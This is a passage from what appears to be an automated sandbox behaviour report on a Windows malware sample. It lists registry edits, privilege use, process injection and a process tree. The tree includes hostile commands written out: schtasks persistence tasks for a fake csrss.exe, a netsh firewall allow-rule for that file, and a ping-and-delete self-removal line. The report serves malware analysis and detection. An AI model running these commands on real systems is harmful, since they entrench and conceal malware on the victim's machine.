Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe 
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs 
powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ KQwfUoo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-3142 = "South Sudan Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) 
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer KQwfUoo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key 
created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe -
Processes:
WZ5cX3pyFhvxZFq1AmkufeHv.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 WZ5cX3pyFhvxZFq1AmkufeHv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = (certificate blob omitted) WZ5cX3pyFhvxZFq1AmkufeHv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = (certificate blob omitted) WZ5cX3pyFhvxZFq1AmkufeHv.exe -
Runs ping.exe 1 TTPs 2 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
RegAsm.exeu2dw.0.exedialer.exepowershell.exepowershell.exepowershell.exexS3VUm3AkBIOCvlKG8AJkD7Z.exeGUfrwuhZbYaOvK64ZU92F4kb.exe1W7hBQbCXjFNhD9IQsfTupEb.exepowershell.exepowershell.exepowershell.exeGUfrwuhZbYaOvK64ZU92F4kb.exexS3VUm3AkBIOCvlKG8AJkD7Z.exe1W7hBQbCXjFNhD9IQsfTupEb.exepowershell.exepid Process 1108 RegAsm.exe 1108 RegAsm.exe 3636 u2dw.0.exe 3636 u2dw.0.exe 5016 dialer.exe 5016 dialer.exe 4264 powershell.exe 4264 powershell.exe 1852 powershell.exe 1852 powershell.exe 4200 powershell.exe 4200 powershell.exe 5016 dialer.exe 5016 dialer.exe 1852 powershell.exe 4200 powershell.exe 4264 powershell.exe 3636 u2dw.0.exe 3636 u2dw.0.exe 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe 4204 powershell.exe 4204 powershell.exe 1908 powershell.exe 1908 powershell.exe 4204 powershell.exe 1908 powershell.exe 4196 powershell.exe 4196 powershell.exe 4196 powershell.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 4656 GUfrwuhZbYaOvK64ZU92F4kb.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 2224 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 5724 powershell.exe 5724 powershell.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 1W7hBQbCXjFNhD9IQsfTupEb.exe 4452 
1W7hBQbCXjFNhD9IQsfTupEb.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
installutil.exepowershell.exepowershell.exepowershell.exeGUfrwuhZbYaOvK64ZU92F4kb.exexS3VUm3AkBIOCvlKG8AJkD7Z.exe1W7hBQbCXjFNhD9IQsfTupEb.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.execsrss.exesc.exepowershell.exepowershell.exepowershell.EXEdescription pid Process Token: SeDebugPrivilege 1472 installutil.exe Token: SeDebugPrivilege 4264 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 4200 powershell.exe Token: SeDebugPrivilege 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe Token: SeDebugPrivilege 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe Token: SeImpersonatePrivilege 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe Token: SeImpersonatePrivilege 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe Token: SeDebugPrivilege 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe Token: SeImpersonatePrivilege 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe Token: SeDebugPrivilege 4204 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 4196 powershell.exe Token: SeDebugPrivilege 5724 powershell.exe Token: SeDebugPrivilege 6004 powershell.exe Token: SeDebugPrivilege 4880 powershell.exe Token: SeDebugPrivilege 5452 powershell.exe Token: SeDebugPrivilege 5708 powershell.exe Token: SeDebugPrivilege 5268 powershell.exe Token: SeDebugPrivilege 2952 powershell.EXE Token: SeDebugPrivilege 6100 powershell.exe Token: SeDebugPrivilege 4444 powershell.EXE Token: SeDebugPrivilege 5796 powershell.exe Token: SeDebugPrivilege 4128 powershell.exe Token: SeSystemEnvironmentPrivilege 6108 csrss.exe Token: SeSecurityPrivilege 5920 sc.exe Token: SeSecurityPrivilege 5920 sc.exe Token: SeDebugPrivilege 3808 powershell.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeDebugPrivilege 516 powershell.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
u2dw.1.exepid Process 4940 u2dw.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exeinstallutil.exeO0CPJ0FFbJ7m6QGvaPcCCRWK.exeGJJottccSrZvHDi2rOc2biM9.exeGUfrwuhZbYaOvK64ZU92F4kb.exexS3VUm3AkBIOCvlKG8AJkD7Z.exe1W7hBQbCXjFNhD9IQsfTupEb.exeRegAsm.exeu2dw.1.execmd.exeWZ5cX3pyFhvxZFq1AmkufeHv.exedescription pid Process procid_target PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 3300 wrote to memory of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 1472 wrote to memory of 3092 1472 installutil.exe 86 PID 1472 wrote to memory of 3092 1472 installutil.exe 86 PID 1472 wrote to memory of 3092 1472 installutil.exe 86 PID 1472 wrote to memory of 2244 1472 installutil.exe 87 PID 1472 wrote to memory of 2244 1472 installutil.exe 87 PID 1472 wrote to memory of 2244 1472 installutil.exe 87 PID 1472 wrote to memory of 3548 1472 installutil.exe 89 PID 1472 wrote to memory of 3548 1472 installutil.exe 89 PID 1472 wrote to memory of 3548 1472 installutil.exe 89 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 90 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 90 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 90 PID 1472 wrote to memory of 3180 1472 installutil.exe 92 PID 1472 wrote to 
memory of 3180 1472 installutil.exe 92 PID 1472 wrote to memory of 3180 1472 installutil.exe 92 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 2244 wrote to memory of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 PID 1472 wrote to memory of 3700 1472 installutil.exe 95 PID 1472 wrote to memory of 3700 1472 installutil.exe 95 PID 1472 wrote to memory of 3700 1472 installutil.exe 95 PID 3092 wrote to memory of 3636 3092 GJJottccSrZvHDi2rOc2biM9.exe 97 PID 3092 wrote to memory of 3636 3092 GJJottccSrZvHDi2rOc2biM9.exe 97 PID 3092 wrote to memory of 3636 3092 GJJottccSrZvHDi2rOc2biM9.exe 97 PID 3700 wrote to memory of 4264 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe 185 PID 3700 wrote to memory of 4264 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe 185 PID 3700 wrote to memory of 4264 3700 GUfrwuhZbYaOvK64ZU92F4kb.exe 185 PID 3180 wrote to memory of 1852 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 101 PID 3180 wrote to memory of 1852 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 101 PID 3180 wrote to memory of 1852 3180 xS3VUm3AkBIOCvlKG8AJkD7Z.exe 101 PID 3548 wrote to memory of 4200 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe 217 PID 3548 wrote to memory of 4200 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe 217 PID 3548 wrote to memory of 4200 3548 1W7hBQbCXjFNhD9IQsfTupEb.exe 217 PID 1108 wrote to memory of 5016 1108 RegAsm.exe 105 PID 1108 wrote to memory of 5016 1108 RegAsm.exe 105 PID 1108 wrote to memory of 5016 1108 RegAsm.exe 105 PID 1108 wrote to memory of 5016 1108 RegAsm.exe 105 PID 1108 wrote to memory of 5016 1108 RegAsm.exe 105 PID 3092 wrote to memory of 4940 3092 
GJJottccSrZvHDi2rOc2biM9.exe 110 PID 3092 wrote to memory of 4940 3092 GJJottccSrZvHDi2rOc2biM9.exe 110 PID 3092 wrote to memory of 4940 3092 GJJottccSrZvHDi2rOc2biM9.exe 110 PID 4940 wrote to memory of 4204 4940 u2dw.1.exe 151 PID 4940 wrote to memory of 4204 4940 u2dw.1.exe 151 PID 4940 wrote to memory of 4204 4940 u2dw.1.exe 151 PID 4204 wrote to memory of 2908 4204 cmd.exe 115 PID 4204 wrote to memory of 2908 4204 cmd.exe 115 PID 4204 wrote to memory of 2908 4204 cmd.exe 115 PID 1472 wrote to memory of 856 1472 installutil.exe 116 PID 1472 wrote to memory of 856 1472 installutil.exe 116 PID 1472 wrote to memory of 856 1472 installutil.exe 116 PID 856 wrote to memory of 1904 856 WZ5cX3pyFhvxZFq1AmkufeHv.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2600
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5016
C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe"C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Users\Admin\Pictures\GJJottccSrZvHDi2rOc2biM9.exe"C:\Users\Admin\Pictures\GJJottccSrZvHDi2rOc2biM9.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe"C:\Users\Admin\AppData\Local\Temp\u2dw.0.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3636 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe"5⤵PID:1640
C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe"C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:4028 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe7⤵PID:5988
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:2268
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 26285⤵
- Program crash
PID:5700
C:\Users\Admin\AppData\Local\Temp\u2dw.1.exe"C:\Users\Admin\AppData\Local\Temp\u2dw.1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:2908
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:4516
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 15324⤵
- Program crash
PID:2200
C:\Users\Admin\Pictures\O0CPJ0FFbJ7m6QGvaPcCCRWK.exe"C:\Users\Admin\Pictures\O0CPJ0FFbJ7m6QGvaPcCCRWK.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6125⤵
- Program crash
PID:2664
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6165⤵
- Program crash
PID:2032
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 8524⤵
- Program crash
PID:2516
C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200
C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"C:\Users\Admin\Pictures\1W7hBQbCXjFNhD9IQsfTupEb.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4196
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:6024
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5220
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4880 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4264
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5268
C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"C:\Users\Admin\Pictures\xS3VUm3AkBIOCvlKG8AJkD7Z.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4204
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5564
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5640
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5724
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2796
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:6108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6100
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3488
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:5656
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5796
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
